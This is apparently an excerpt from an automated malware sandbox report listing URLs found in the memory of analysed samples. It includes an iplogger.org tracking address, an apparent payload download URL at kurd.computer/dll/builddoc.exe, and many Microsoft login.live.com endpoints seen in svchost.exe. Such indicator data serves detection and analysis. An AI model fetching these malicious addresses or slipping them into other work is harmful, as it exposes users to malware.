00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.drString found in binary or memory: https://iplogger.org/rules/
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/dll/builddoc.exe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/dll/builddoc.exe0
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/dll/builddoc.exep
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/dll/builddoc.exex_
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer:80/dll/builddoc.exe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer:80/dll/builddoc.exe)x
                  Source: svchost.exe, 00000034.00000003.1977042587.000001F4D9655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1553593331.000001F4D86EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfsrf
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfrf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1977042587.000001F4D9655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf$
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfice
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfen
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfuer
                  Source: svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000034.00000003.1518831614.000001F4D8F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dt
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfn
                  Source: svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805021
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806043
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376112342.000001F4D8F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                  Source: svchost.exe, 00000034.00000003.1361507616.000001F4D8F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp8
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srff
                  Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
